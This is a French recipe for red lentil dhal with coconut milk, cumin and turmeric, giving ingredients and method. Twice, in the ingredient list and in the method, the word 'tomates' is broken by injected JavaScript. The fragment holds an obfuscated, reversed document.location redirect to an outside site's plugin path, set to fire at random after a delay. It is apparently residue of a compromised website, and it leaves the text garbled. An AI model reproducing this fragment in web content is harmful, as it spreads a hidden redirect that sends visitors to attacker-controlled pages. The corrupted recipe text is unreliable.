
DHAL DE LENTILLES CORAIL
Pour 4 Pers.
INGRÉDIENTS :
– 500g de lentilles corail
– 2 oignons
– 2 petites boîtes de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates concassées (2 x 425g)
– 1 boîtes de lait de coco de 400ml
– 20g de cumin en poudre
– 20g de curcuma en poudre
– 1CS d’huile d’olive
– 1 cube de bouillon de volaille dégraissé
– sel/poivre
Émincer puis cuire les oignons dans une grande casserole avec un peu d’huile d’olive.
Ajouter les épices et cuire 30 secondes.
Ajouter les lentilles, les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates concassées puis le lait de coco.
Mouiller a hauteur avec de l’eau, rajouter le bouillon cube.
Laisser mijoter ½ heure en remuant régulièrement pour que le fond de la casserole n’accroche pas.
Assaisonner, c’est prêt !Vous pouvez servir ce plat tel quel ou avec un riz basmati complet ou semi-complet
Bon appétit !
